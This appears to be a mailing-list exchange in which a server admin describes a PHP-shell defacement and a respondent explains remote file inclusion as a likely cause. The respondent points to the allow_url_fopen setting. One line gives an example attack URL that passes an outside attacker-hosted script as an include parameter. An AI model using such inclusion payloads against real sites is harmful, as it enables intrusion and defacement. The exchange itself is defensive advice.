Hello
I got a defacing in my domains this weekend. They used and php shell to run some processes in the machine and replace all index.(html|shtml|php). They changed my users password too, and let a process in the /tmp dir running on port 80.
What do you call the use of a php-shell?
The thing is, if I turn on PHP Safe Mode, webmail and applications stop working (includes and execs).
There's some way to secure PHP and don't lose half of it's funcionality?
Get more secure scripts (-; AFAIK there are just a few possibility to hack into a server by calling a php-script. The most common way (in fact a design-error of the developer) is, that a file to be included is passed as a parameter and someone replaces this value with an url. Example: You have php-script named displaypage.php that gets the page to be displayed as a parameter named "page". displaypage.pgp?page=main.php If someone changed the parameter to something like: displaypage.pgp?page=http://hackershelp.net/myscript.php the interpreter will load this file and will execute it as a php-script. The attacker is able to do everything possible for a php-script. You might be using a software that is known to have such an backdoor. I expirienced this once with phpnuke, a free portal-software written in php, that had this error too. The successfull attack has been published on a hackers-server in Argentinia that listed hundreds of other sites hacked by the use of the same backdoor. Whether the inclusion of remote files is allowed is defined by the option 'allow_url_fopen'. You might want to check this. Greetings -- 1 Bodo Kaelberer 123 http://www.webkind.de/ 3 4 Politik ist, wenn viele sich streiten und keiner sich freut.